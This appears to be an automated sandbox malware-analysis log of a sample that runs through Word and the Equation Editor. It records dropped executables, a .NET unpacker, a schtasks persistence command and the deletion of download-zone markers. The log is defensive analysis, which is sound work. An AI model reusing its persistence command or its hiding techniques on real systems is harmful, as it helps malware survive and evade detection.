Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb9FFP source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\dll\System.pdbog source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
Source:	Binary string: System.pdb H source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
Source:	Binary string: qC:\Windows\System.pdb4 source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
Source:	Binary string: s.pdb source: RegSvcs.exe, 00000008.00000002.671847791.0000000000C7D000.00000004.00000001.sdmp
Source:	Binary string: RegSvcs.pdb source: smtpsvc.exe
Source:	Binary string: #=qo5Pv9nXCIU9X_B8SJDUR_qgp7npNK2pA1rGP0GNQ51o=symbols\dll\System.pdb source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
Source:	Binary string: C:\Win.pdbassembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
Source:	Binary string: System.pdb8 source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
Source:	Binary string: ystem.pdbl2}/ source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
Source:	Binary string: indows\System.pdbpdbtem.pdbes source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: plugmanzx[1].exe.2.dr, ConsoleGame/Form1.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: plugmangd5693.exe.2.dr, ConsoleGame/Form1.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: RWbqWnnjDWI.exe.4.dr, ConsoleGame/Form1.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.plugmangd5693.exe.330000.0.unpack, ConsoleGame/Form1.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.plugmangd5693.exe.330000.0.unpack, ConsoleGame/Form1.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_003377A7 push es; ret	4_2_00337892
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_00337895 push es; ret	4_2_00337898
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_00309288 push ebp; retn 0030h	4_2_00309289
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_00306D54 pushad ; retn 0021h	4_2_00307875
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F84A0 pushfd ; retf 006Eh	4_2_006F84A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_00763DFF push es; ret	8_2_007641D4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_0076410E push es; retn 0000h	8_2_0076410B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_0076410E push es; ret	8_2_007641D4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_0019989B push ecx; retf 0019h	8_2_001998A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_0019749C push ecx; ret	8_2_0019749D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_001974A8 push ebp; ret	8_2_001974A9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_00199D68 pushad ; retf	8_2_00199D69
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_00199D64 push eax; retf	8_2_00199D65

Source: initial sample	Static PE information: section name: .text entropy: 7.51220461455
Source: initial sample	Static PE information: section name: .text entropy: 7.51220461455
Source: initial sample	Static PE information: section name: .text entropy: 7.51220461455

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	File created: C:\Users\user\AppData\Roaming\RWbqWnnjDWI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\RWbqWnnjDWI' /XML 'C:\Users\user\AppData\Local\Temp\tmp3709.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
